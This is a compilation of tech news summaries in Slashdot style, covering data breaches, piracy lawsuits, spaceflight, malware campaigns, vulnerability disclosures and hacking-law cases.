The founder of the data-breach notification site Have I Been Pwned manages "the largest known repository of stolen data on the planet," reports Australia's public broadcaster ABC, including over 6 billion email address. Yet with no employees, Troy Hunt manages all of the technical and operational aspects single-handedly, and "has ended up playing an oddly central role in global cybersecurity." Troy is very careful with how he handles what he finds. He only collects (and encrypts) the mobile numbers, emails and passwords that he finds in the breaches, discarding the victims' names, physical addresses, bank details and other sensitive information. The idea is to let users find out where their data has been leaked from, but without exposing them to further risk. Once he identifies where a data breach has occurred, Troy also contacts the organisation responsible to allow it to inform its users before he does. This, he says, is often the hardest step of the process because he has to convince them it's legitimate and not some kind of scam itself.

He's not required to give organisations this opportunity, much less persist when they ignore his messages or accuse him of trying to shake them down for money. But there's evidence that this approach is working. Despite the legal grey area he has operated in for a decade now, he's avoided being sued by any of the organisations responsible for the 705 breaches that are now searchable on Have I Been Pwned. These days, major tech companies like Mozilla and 1Password use Have I Been Pwned, and Troy likes to point out that dozens of national governments and law enforcement agencies also partner with his service...

"He's not a company that's audited. He's just a dude on the web," says Jane Andrew, an expert on data breaches at the University of Sydney. "I think it's so shocking that this is where we find out information about ourselves. She says governments and law enforcement have, in general, left it to individuals to deal with the fallout from data breaches... Without an effective global regulator, Professor Andrew says, a crucial part of the world's cybersecurity infrastructure is left to rely on the goodwill of this one man on the Gold Coast.
Thanks to long-time Slashdot reader slincolne for sharing the article.

A group of publishers in the U.S. have filed a lawsuit against the "notorious" online database Library Genesis (Libgen), a website known for providing free access to scientific papers and books. The lawsuit accuses Libgen of facilitating the unauthorized distribution of copyrighted academic materials. The Register reports: The suit, filed in a New York federal court [PDF], asks for a legal order "requiring the transfer of the Libgen domain names to plaintiffs or, at plaintiffs' election, canceling or deleting the Libgen domain names," with the idea of frustrating visitors -- mostly students -- believed to number in their millions. The filing said that according to similarweb.com, the sites collectively were visited by 9 million people from the U.S. each month from March to May 2023. The suit alleges that several of the Libgen websites solicit "donations" from users. "These solicitations are in English and seek payments only in Bitcoin or [Monero]." It adds: "one Libgen Site reports that it has raised $182,540 from donations since January 1, 2023."

The publishers also claim the people who run LibGen -- named in the suit as Does 1-50 and whom it says "are believed to reside outside of the United States at unknown foreign locations" -- derive "revenue from interstate or international commerce, including through advertisements." It goes on to add: "Defendants compete directly with Plaintiffs by distributing infringing copies of their works for free, displacing legitimate sales. When a consumer obtains Plaintiffs' works from the Libgen Sites instead of through legitimate channels, no remuneration is provided to Plaintiffs or their authors for the substantial investments they have made to create and publish the works."

The textbook publishers claim that "through social media and from their peers, students are bombarded with messages to use the Libgen Sites instead of paying for legal copies of textbooks" -- thus depriving the publishers and the authors they represent of their income. The suit also asks for damages without detailing an amount, although it asks for "an accounting and disgorgement of Defendants' profits, gains, and advantages realized from their unlawful conduct." The complaint claims the ads are in English and for various "U.S. products, such as browser extensions and online games". The suit adds that some "also appear to be phishing attempts, which can result in users downloading a virus or other malicious program onto their computers."

The lawsuit also calls out Google and "other intermediaries," U.S. companies it claims help LibGen "conduct their unlawful operations" -- "NameCheap for domain registration services, Cloudflare for proxy services, and Google for search engine services." It goes on to include a screenshot of Google's "knowledge panel," which it says "describes Libgen as a site [that] enables free access to content that is otherwise paywalled or not digitized elsewhere."

An anonymous reader shares a report: When top anime streaming platform Crunchyroll was first gaining popularity as a pirated-video site in the mid-2000s, Japanese animation was considered a niche form of entertainment, appealing mainly to enthusiasts known as otaku. Today, it's a $20 billion industry spanning streaming, games and merchandise, and the company's hit series, such as One Piece and Demon Slayer, have drawn millions of US and European subscribers. Crunchyroll, now owned by Sony Group, is setting its sights on India as a major growth market -- one that could help the industry further expand from a made-in-Japan subculture into a mainstream and global phenomenon.

The company, founded in 2006 by graduates of the University of California at Berkeley, started off as an anime-sharing site. It eventually began streaming only legitimate content, helped by investment from venture capitalists including former News Corp. President Peter Chernin and ownership by AT&T's WarnerMedia. Now the largest anime-dedicated streaming platform in the world, it was bought by Sony in a $1.2 billion deal announced in 2020. Crunchyroll has more than 100 million registered members, including 11 million paid users, after rapid subscriber growth during the pandemic when people binge-watched exotic content. With growth in Western markets moderating, the anime giant is looking to India for its next breakthrough, according to President Rahul Purini.

An anonymous reader quotes a report from Ars Technica: SpaceX on Sunday evening launched a commercial mission to the International Space Station carrying four people, including former NASA astronaut Peggy Whitson. This "Axiom-2" mission was commanded by Whitson and carried a paying customer named John Shoffner, who served as pilot, as well as two Saudi Arabian mission specialists, Ali al-Qarni and Rayyanah Barnawi. Shoffner and the government of Saudi Arabia procured the seats on Crew Dragon from Axiom, a Houston-based spaceflight company that brokered the mission to the space station. Whitson is an employee of Axiom. The crew of four is flying the second fully private mission to the International Space Station and will spend about a week on board the orbiting laboratory before departing for Earth -- weather permitting -- on May 30.

The Axiom-2 crew members say they will conduct about 20 scientific experiments while on the station. It is not clear how much of this is legitimate science and how much of it is lip service, but certainly it is beneficial for NASA and other space agencies to gather human performance data from a wide variety of individuals like those on the Axiom-2 flight. Perhaps most significantly, the Axiom missions are expanding the envelope of human spaceflight. By purchasing such flights, these pioneering commercial astronauts are providing funding for the development of new technologies and habitats that should, over time, bring down the cost of access to space and living there.

For SpaceX, this was its 10th human space mission since the Demo-2 flight for NASA that launched in May 2020. In less than three years, the company has now put 38 people into orbit. Of these, 26 were professional astronauts from NASA and its international partners, including Russia; eight were on Axiom missions, and four on Jared Isaacman's Inspiration4 orbital free-flyer mission. Isaacman is due to make a second private flight on board Dragon, Polaris Dawn, later this year. [...] Also on Sunday, for the first time, SpaceX returned a Falcon 9 first stage to a ground-based landing pad near its launch site after a human spaceflight mission. The company was able to do this by squeezing a little bit more performance out of its workhorse rocket, which has now launched more than 230 times. You can watch a recording of the launch here.

Fifteen years after launching Google Docs and Sheets with file sharing, Google is adding what sounds like adequate safety controls to the feature. From a report: Google Drive (the file repository interface that contains your Docs, Sheets, and Slides files) is finally getting a spam folder and algorithmic spam filters, just like Gmail has. It sounds like the update will provide a way to limit Drive's unbelievably insecure behavior of allowing random people to add files to your Drive account without your consent or control. Because Google essentially turned Drive file-sharing into email, Google Drive needs every spam control that Gmail has. Anyone with your email address can "share" a file with you, and a ton of spammers already have your email address. Previously, Drive assumed that all shared files were legitimate and wanted, with the only "control" being "security by obscurity" and hoping no one else knew your email address.

Drive shows any shared files in your shared documents folder, notifies you of the share on your phone, highlights the "new recent file" at the top of the Drive interface, lists the file in searches, and sends you an email about it, all without any indication that you know the file sharer at all. For years, some people in my life have been inundated with shared Google Drive files containing porn, ads, dating site scams, and malware. For a long time, there was nothing you could do to support affected users other than disabling Drive notifications, telling them to ignore the highlighted porn ads at the top of their Drive account, and warning them to never click on the "shared files" folder.

A ransomware intrusion on hardware manufacturer Micro-Star International, better known as MSI, is stoking concerns of devastating supply chain attacks that could inject malicious updates that have been signed with company signing keys that are trusted by a huge base of end-user devices, a researcher said. From a report: "It's kind of like a doomsday scenario where it's very hard to update the devices simultaneously, and they stay for a while not up to date and will use the old key for authentication," Alex Matrosov, CEO, head of research, and founder of security firm Binarly, said in an interview. "It's very hard to solve, and I don't think MSI has any backup solution to actually block the leaked keys."

The intrusion came to light in April when, as first reported by Bleeping Computer, the extortion portal of the Money Message ransomware group listed MSI as a new victim and published screenshots purporting to show folders containing private encryption keys, source code, and other data. A day later, MSI issued a terse advisory saying that it had "suffered a cyberattack on part of its information systems." The advisory urged customers to get updates from the MSI website only. It made no mention of leaked keys. Since then, Matrosov has analyzed data that was released on the Money Message site on the dark web. To his alarm, included in the trove were two private encryption keys. The first is the signing key that digitally signs MSI firmware updates to cryptographically prove that they are legitimate ones from MSI rather than a malicious impostor from a threat actor. This raises the possibility that the leaked key could push out updates that would infect a computer's most nether regions without triggering a warning. To make matters worse, Matrosov said, MSI doesn't have an automated patching process the way Dell, HP, and many larger hardware makers do. Consequently, MSI doesn't provide the same kind of key revocation capabilities.

Bleeping Computer warned this week about compromised web sites "that display fake Google Chrome automatic update errors that distribute malware to unaware visitors." The campaign has been underway since November 2022, and according to NTT's security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish. BleepingComputer has found numerous sites hacked in this malware distribution campaign, including adult sites, blogs, news sites, and online stores...

If a targeted visitor browses the site, the scripts will display a fake Google Chrome error screen stating that an automatic update that is required to continue browsing the site failed to install. "An error occurred in Chrome automatic update. Please install the update package manually later, or wait for the next automatic update," reads the fake Chrome error message. The scripts will then automatically download a ZIP file called 'release.zip' that is disguised as a Chrome update the user should install.

However, this ZIP file contains a Monero miner that will utilize the device's CPU resources to mine cryptocurrency for the threat actors. Upon launch, the malware copies itself to C:\Program Files\Google\Chrome as "updater.exe" and then launches a legitimate executable to perform process injection and run straight from memory. According to VirusTotal, the malware uses the "BYOVD" (bring your own vulnerable driver) technique to exploit a vulnerability in the legitimate WinRing0x64.sys to gain SYSTEM privileges on the device.

The miner persists by adding scheduled tasks and performing Registry modifications while excluding itself from Windows Defender. Additionally, it stops Windows Update and disrupts the communication of security products with their servers by modifying the IP addresses of the latter in the HOSTS file. This hinders updates and threat detection and may even disable an AV altogether.

Since launching in 2020, the nonprofit site RestofWorld.org has been covering global tech news from 100 countries, the site announced this week. "But at Rest of World, the story of tech is as big as the world that's using it" — so they just finished their first international photography contest. We asked our readers to send us images of technology's impact in their communities — as seen from their lenses. We received 548 entries from around the world, including from Afghanistan, Mexico, Nigeria, Iraq, and Pakistan. Photographers captured a wide range of issues, from facial recognition software used at gated communities in Brazil to students studying on their phones during a power outage in India.
They recognized 10 photos in all — three winners, and seven "honorable mentions" — including one showing a surgeon implanting a venomous snake with a radio telemetry device in India "to try and mitigate human-snake conflict in the region," as well as a stunning aerial view of a vast solar park in Dubai. There's a solar-powered cooking device in India, and the face of an old man in Nepal using headphones for the first time in his life.

And the #1 photo shows children in rural Palestine watching TV "with electricity generated from solar panels at their home inside a cave," vividly illustrating the point that they'd turned to a decentralized, self-generated power technology. ("For decades, rural Palestinian communities in Masafer Yatta have lobbied for connection to the electric grid, but the Israeli state does not recognize such villages as legitimate and refuses to issue any kind of master plan for their development.")

Anti-piracy group CODA is reporting the shutdown of B9Good, a pirate manga site that targeted Japan but was operated from China. In response to a criminal complaint filed by CODA on behalf of six Japanese companies, which were backed by 21 others during the investigation, Chinese authorities arrested four people and seized one house worth $580,000. TorrentFreak reports: Manga piracy site B9Good initially appeared in 2008 and established itself under B9DM branding. SimilarWeb stats show that the site was enjoying around 15 million visits each month, with CODA noting that in the two-year period leading to February 2023, the site was accessed more than 300 million times Around 95% of the site's visitors came from Japan. B9Good had been featured in an MPA submission to the USTR's notorious markets report in 2019. Traffic was reported as almost 16 million visits per month back then, meaning that site visitor numbers remained stable for the next three years. The MPA said the site was possibly hosted in Canada, but domain records since then show a wider spread, including Hong Kong, China, United States, Bulgaria, and Japan.

Wherever the site ended up, the location of its operator was more important. In 2021, CODA launched its International Enforcement Project (CBEP), which aimed to personally identify the operators of pirate sites, including those behind B9Good who were eventually traced to China. Pursuing copyright cases from outside China is reportedly difficult, but CODA had a plan. In January 2022, CODA's Beijing office was recognized as an NGO with legitimate standing to protect the rights of its member companies. Working on behalf of Aniplex, TV Tokyo, Toei Animation, Toho, Japan Broadcasting Corporation (NHK), and Bandai Namco Film Works, CODA filed a criminal complaint in China, and starting February 14, 2023, local authorities began rounding up the B9Good team.

schwit1 shares an excerpt from a Substack article, written by former cybersecurity reporter Catalin Cimpanu: The Canada Revenue Agency (CRA), the tax department of Canada, recently updated its terms and conditions to force taxpayers to agree that CRA is not liable if their personal information is stolen while using the My Account online service portal -- which, ironically, all Canadians must use when doing their taxes and/or running their business. The CRA's terms of use assert the agency is not liable because they have "taken all reasonable steps to ensure the security of this Web site."

Excerpt from the CRA terms statement: "10. The Canada Revenue Agency has taken all reasonable steps to ensure the security of this Web site. We have used sophisticated encryption technology and incorporated other procedures to protect your personal information at all times. However, the Internet is a public network and there is the remote possibility of data security violations. In the event of such occurrences, the Canada Revenue Agency is not responsible for any damages you may experience as a result."

Unfortunately, that is not true. After reviewing the HTTP responses from the CRA My Account login page, it's clear the agency has not configured even some of the most basic security features. For example, security protections for their cookies are not configured, nor are all the recommended security headers used. Not only is that not "all reasonable steps," but the CRA is missing the very basics for securing online web applications.

The terms of use also state that users are not allowed to use "any script, robot, spider, Web crawler, screen scraper, automated query program or other automated device or any manual process to monitor or copy the content contained in any online services." Looking at the HTTP response headers using web browser developer tools doesn't breach the terms of services, but the CRA must be well aware that internet users perform scans like this all the time. And it's not the legitimate My Account users who are likely to be the culprits. Unfortunately for Canadians, threat actors don't read terms of use pages. A statement like this doesn't protect anyone, except CRA, from being held responsible for failing to properly secure Canadian citizens' personal data.

joshuark shares a report from BleepingComputer, written by Ax Sharma: Searching for 'GIMP' on Google as recently as last week would show visitors an ad for 'GIMP.org,' the official website of the well known graphics editor, GNU Image Manipulation Program. This ad would appear to be legitimate as it'd state 'GIMP.org' as the destination domain. But clicking on it drove visitors to a lookalike phishing website that provided them with a 700 MB executable disguised as GIMP which, in reality, was malware.

Reddit user ZachIngram04 earlier shared the development stating that the ad previously took users to a Dropbox URL to serve malware, but was soon "replaced with an even more malicious one" which employed a fake replica website 'gilimp.org' to serve malware. BleepingCompuer observed another domain 'gimp.monster' related to this campaign. To pass off the trojanized executable as GIMP in a believable manner to the user, the threat actor artificially inflated the malware, that is otherwise under 5 MB in size, to 700 MB by a simple technique known as binary padding. It still isn't clear if this instance was a slip up caused by a potential bug in Google Ad Manager that allowed malvertising.

Israel has deployed a new kind of robotic weapon over a Palestinian refugee camp in the West Bank, reports Euronews. "The twin gun turrets can fire tear gas, stun grenades, and sponge-tipped bullets."

"Operated by trained soldiers, they track their targets using AI."

Slashdot reader DevNull127 writes: A Euronews video features footage of Sharone Aloni, Research and Development VP of Sharp Shooter, demonstrating one of the company's devices with an automatic Fire Control System. "Inside here, you have the computer running all the artificial intelligence, computer vision algorithms, which makes this what we call a true fire control system," Aloni says. "It's not only just relying on static information. It actually considers the human, the soldier, which is not stable. He's under pressure. He's tired. Sometimes he didn't get enough training. And also, the target is usually dynamic, and it's moving all the time."

The company's web site promises the systems "significantly increase weapon accuracy." And according to Euronews, Israel's army "says the tech protects soldiers, who can fire more accurately at a distance." But Omar Shakir, Human Rights Watch's director for Israel and Palestine, counters that when he hears claims of a reduction in risks, "that's often a one-sided kind of risk. It might minimize the risk for the occupying force or the army deploying it, but often it invariably increases the risk to affected communities." Sophisticated weapons systems "will lack elements of human control and agency that are often the difference between life and death." Euronews adds that "Palestinians and human rights experts say the weapons are dehumanizing, dangerous and unaccountable."

Sharp Shooter has a response to that, according to Eurnoews: the robotic guns are not fully automated, so a soldier must always pull the trigger, with the system only firing "after algorithms assess factors like wind speed, distance and velocity." And Michal Mor, Sharp Shooter's CEO and founder, also describes its utility in fighting a terrorist. "Usually the terrorist will be inside a civilian environment with many people that we do not want to hurt.

"We're enabling the soldier to look through his fire control system, to make sure that the target that he wants to hit is the legitimate target. Once he locks on the target, the system will make sure that the round will be released when he presses the trigger, only on the legitimate target, and none of the bystanders can be hit by the weapon."
The Israeli army stressed to Euronews that their deployment isn't using live rounds, and can only fire tear gas, stun grenades, and sponge-tipped bullets.

A resident of the refugee camp tells Euronews that the gun "is very fast, even faster than the soldiers."

An anonymous reader quotes a report from Ars Technica: A security firm and the US government are advising the public to immediately stop using a popular GPS tracking device or to at least minimize exposure to it, citing a host of vulnerabilities that make it possible for hackers to remotely disable cars while they're moving, track location histories, disarm alarms, and cut off fuel. An assessment from security firm BitSight found six vulnerabilities in the Micodus MV720, a GPS tracker that sells for about $20 and is widely available. The researchers who performed the assessment believe the same critical vulnerabilities are present in other Micodus tracker models. The China-based manufacturer says 1.5 million of its tracking devices are deployed across 420,000 customers. BitSight found the device in use in 169 countries, with customers including governments, militaries, law enforcement agencies, and aerospace, shipping, and manufacturing companies.

BitSight discovered (PDF) what it said were six "severe" vulnerabilities in the device that allow for a host of possible attacks. One flaw is the use of unencrypted HTTP communications that makes it possible for remote hackers to conduct adversary-in-the-middle attacks that intercept or change requests sent between the mobile application and supporting servers. Other vulnerabilities include a flawed authentication mechanism in the mobile app that can allow attackers to access the hardcoded key for locking down the trackers and the ability to use a custom IP address that makes it possible for hackers to monitor and control all communications to and from the device.

The vulnerabilities include one tracked as CVE-2022-2107, a hardcoded password that carries a severity rating of 9.8 out of a possible 10. Micodus trackers use it as a master password. Hackers who obtain this passcode can use it to log in to the web server, impersonate the legitimate user, and send commands to the tracker through SMS communications that appear to come from the GPS user's mobile number. With this control, hackers can: Gain complete control of any GPS tracker; Access location information, routes, geofences, and track locations in real time; Cut off fuel to vehicles; and Disarm alarms and other features. A separate vulnerability, CVE-2022-2141, leads to a broken authentication state in the protocol the Micodus server and the GPS tracker use to communicate. Other vulnerabilities include a hardcoded password used by the Micodus server, a reflected cross-site scripting error in the Web server, and an insecure direct object reference in the Web server. The other tracking designations include CVE-2022-2199, CVE-2022-34150, CVE-2022-33944. The U.S. Cybersecurity and Infrastructure Security Administration is also warning about the risks posed by the critical security bugs. "Successful exploitation of these vulnerabilities could allow an attacker control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff commands, and the disarming of various features (e.g., alarms)," agency officials wrote.

Fraudsters who exploit LinkedIn to lure users into cryptocurrency investment schemes pose a "significant threat" to the platform and consumers, according to Sean Ragan, the FBI's special agent in charge of the San Francisco and Sacramento, California, field offices. From a report: "It's a significant threat," Ragan said in an exclusive interview. "This type of fraudulent activity is significant, and there are many potential victims, and there are many past and current victims." The scheme works like this: A fraudster posing as a professional creates a fake profile and reaches out to a LinkedIn user. The scammer starts with small talk over LinkedIn messaging, and eventually offers to help the victim make money through a crypto investment. Victims interviewed by CNBC say since LinkedIn is a trusted platform for business networking, they tend to believe the investments are legitimate. Typically, the fraudster directs the user to a legitimate investment platform for crypto, but after gaining their trust over several months, tells them to move the investment to a site controlled by the fraudster. The funds are then drained from the account.

"Paige Thompson worked as a software engineer in Seattle and ran an online community for other programmers," remembers the New York Times. [Alternate URL here and here.]

"In 2019, she downloaded personal information belonging to more than 100 million Capital One customers, the Justice Department said..." It included 140,000 Social Security numbers and 80,000 bank account numbers (drawn from applications for credit cards). Nearly three years after the disclosure of one of the largest data breaches in the United States, the former Amazon employee accused of stealing customers' personal information from Capital One is standing trial in a case that will test the power of a U.S. anti-hacking law.... She faces 10 counts of computer fraud, wire fraud and identity theft in a federal trial that began Tuesday in Seattle.... Thompson, 36, is accused of violating an anti-hacking law known as the Computer Fraud and Abuse Act, which forbids access to a computer without authorization. Thompson has pleaded not guilty, and her lawyers say her actions — scanning for online vulnerabilities and exploring what they exposed — were those of a "novice white-hat hacker."

Critics of the computer fraud law have argued that it is too broad and allows for prosecutions against people who discover vulnerabilities in online systems or break digital agreements in benign ways, such as using a pseudonym on a social media site that requires users to go by their real names. In recent years, courts have begun to agree. The Supreme Court narrowed the scope of the law last year, ruling that it could not be used to prosecute people who had legitimate access to data but exploited their access improperly. And in April, a federal appeals court ruled that automated data collection from websites, known as web scraping, did not violate the law. Last month, the Justice Department told prosecutors that they should no longer use the law to pursue hackers who engaged in "good-faith security research."

Thompson's trial will raise questions about how far security researchers can go in their pursuit of cybersecurity flaws before their actions break the law. Prosecutors said Thompson had planned to use the information she gathered for identity theft and had taken advantage of her access to corporate servers in a scheme to mine cryptocurrency... The Justice Department has argued that Thompson had no interest in helping Capital One plug the holes in its security and that she cannot be considered a "white hat" hacker. Instead, she chatted with friends online about how she might be able to profit from the breach, according to legal filings.... Some security researchers said Thompson had ventured too far into Capital One's systems to be considered a white-hat hacker.... "Legitimate people will push a door open if it looks ajar," said Chester Wisniewski, a principal research scientist at Sophos, a cybersecurity firm.... But downloading thousands of files and setting up a cryptocurrency mining operation were "intentionally malicious actions that do not happen in the course of testing security," Wisniewski said....

"Thompson scanned tens of millions of AWS customers looking for vulnerabilities," Brown wrote in a legal filing.
The article notes that Capitol One ultimately agreed to pay $80 million in 2020 "to settle claims from federal bank regulators that it lacked the security protocols needed to protect customers' data" and another $190 million to settle a class-action lawsuit representing people whose data was exposed.

"If you've visited a website in recent days and been randomly redirected to the same pages with sketchy "resources" or unwanted ads, it's likely the site in question was 1) built with WordPress tools and 2) hacked," reports Gizmodo. Details come from this blog post by researchers at Sucuri (a security provider owned by GoDaddy): As outlined in our latest hacked website report, we've been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW, the April wave for this campaign was responsible for nearly 6,000 infected websites alone. Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads. The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files... This JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the attacker's destination.... Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects....

At the time of writing, PublicWWW has reported 322 websites impacted by this new wave... Considering that this count doesn't include obfuscated malware or sites that have not yet been scanned by PublicWWW, the actual number of impacted websites is likely much higher. Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing....

We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.
"It's important to note that these hacks are related to themes and plugins built by thousands of third-party developers using the open source WordPress software, not WordPress.com, which offers hosting and tools to build websites," Gizmodo points out. But this also cite this warning from Sucuri malware analyst Krasimir Konov: "This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they'll be opted in to receive unwanted ads even when the site isn't open — and ads will look like they come from the operating system, not from a browser," Konov wrote.

As part of its global anti-piracy mission, the Alliance for Creativity and Entertainment (ACE) has been trying to shut down Pelisplushd.net, a massive pirate streaming site with roughly 70 million visits per month. After tracking down its operator in the remote countryside of Peru, the anti-piracy group says the site is no more. TorrentFreak reports: In a statement published Wednesday, ACE officially announced that it was behind the closure of Pelisplushd.net. The anti-piracy group labeled the platform the second-largest Spanish-language 'rogue website' in the entire Latin American region with 383.5 million visits in the past six months and nearly 75 million visits in February 2022. In Mexico alone, the site had more visitors than hbomax.com, disneyplus.com and primevideo.com, a clear problem for those platforms which are all ACE members.

"This is a huge win for the ACE team based in Latin America as we work to protect the legitimate digital ecosystem throughout the region," said Jan van Voorn, Executive Vice President and Chief of Global Content Protection for the Motion Picture Association. "The successful action against the operator of Pelisplushd.net was only made possible because of evidence that we gathered from previous operations conducted in other countries in Latin America. "This speaks volumes about ACE's ability to crack current cases utilizing years of past gathered intelligence and highlights the global, strategic approach that determines our actions around the world."

The operator of Pelisplushd is yet to be named but ACE reveals that after a positive identification, the anti-piracy group tracked him down to the "remote countryside of Peru." That took place in March and soon after, ACE says the operator agreed to turn over his domains. As far as we can tell the main domain at Pelisplushd.net is not yet completely in ACE/MPA hands but a full transfer will probably take place later.

BleepingComputer was recently contacted by an alleged "venture capitalist" firm that wanted to invest or purchase our site. However, as we later discovered, this was a malicious campaign designed to install malware that provides remote access to our devices. Lawrence Abrams from BleepingComputer writes: Last week, BleepingComputer received an email to our contact form from an IP address belonging to a United Kingdom virtual server company. Writing about cybersecurity for so long, I am paranoid regarding email, messaging, and visiting unknown websites. So, I immediately grew suspicious of the email, fired up a virtual machine and VPN, and did a search for Vuxner. Google showed only a few results for 'Vuxner,' with one being for a well-designed and legitimate-looking vuxner[.]com, a site promoting "Vuxner Chat -- Next level of privacy with free instant messaging." As this appeared to be the "Vuxner chat" the threat actors referenced in their email, BleepingComputer attempted to download it and run it on a virtual machine.

BleepingComputer found that the VuxnerChat.exe download [VirusTotal] actually installs the "Trillian" messaging app and then downloads further malware onto the computer after Trillian finishes installing. As this type of campaign looked similar to other campaigns that have pushed remote access and password-stealing trojans in the past, BleepingComputer reached out to cybersecurity firm Cluster25 who has previously helped BleepingComputer diagnose similar malware attacks in the past. Cluster25 researchers explain in a report coordinated with BleepingComputer that the Vuxner[.]com is hosted behind Cloudflare, however they could still determine hosting server's actual address at 86.104.15[.]123.

The researchers state that the Vuxner Chat program is being used as a decoy for installing a remote desktop software known as RuRAT, which is used as a remote access trojan. Once a user installs the Vuxner Trillian client and exits the installer, it will download and execute a Setup.exe executable [VirusTotal] from https://vuxner[.]com/setup.exe. When done, the victim will be left with a C:\swrbldin folder filled with a variety of batch files, VBS scripts, and other files used to install RuRAT on the device. Cluster25 told BleepingComputer that the threat actors are using this attack to gain initial access to a device and then take control over the host. Once they control the host, they can search for credentials and sensitive data or use the device as a launchpad to spread laterally in a network.

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and adding it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.

Remember when more than 100,000 Social Security numbers of Missouri teachers were revealed in the HTML code of a state web site? The St. Louis Post-Dispatch's reporter informed the state government and delayed publishings his findings until they'd fixed the hole — but the state's governor then demanded the reporter's prosecution, labelling him "a hacker." In the months that followed, throughout a probe — which for some reason was run by the state's Highway Patrol — the governor had continued to suggest that prosecution of that reporter was imminent.

But it's not. The St. Louis Post-Dispatch reports: A St. Louis Post-Dispatch journalist will not be charged after pointing out a weakness in a state computer database, the prosecuting attorney for Cole County said Friday. Prosecutor Locke Thompson issued a statement to television station KRCG Friday, saying he appreciated Gov. Mike Parson for forwarding his concerns but would not be filing charges....

Parson, who had suggested prosecution was imminent throughout the probe, issued a statement saying Thompson's office believed the decision "was properly addressed...." Post-Dispatch Publisher Ian Caso said in a statement Friday: "We are pleased the prosecutor recognized there was no legitimate basis for any charges against the St. Louis Post-Dispatch or our reporter. While an investigation of how the state allowed this information to be accessible was appropriate, the accusations against our reporter were unfounded and made to deflect embarrassment for the state's failures and for political purposes...."

There is no authorization required to examine public websites, but some researchers say overly broad hacking laws in many jurisdictions let embarrassed institutions lob hacking allegations against good Samaritans who try to flag vulnerabilities before they're exploited....

A political action committee supporting Parson ran an ad attacking the newspaper over the computer incident, saying the governor was "standing up to the fake news media."
Thanks to long-time Slashdot reader UnknowingFool for submitting the story.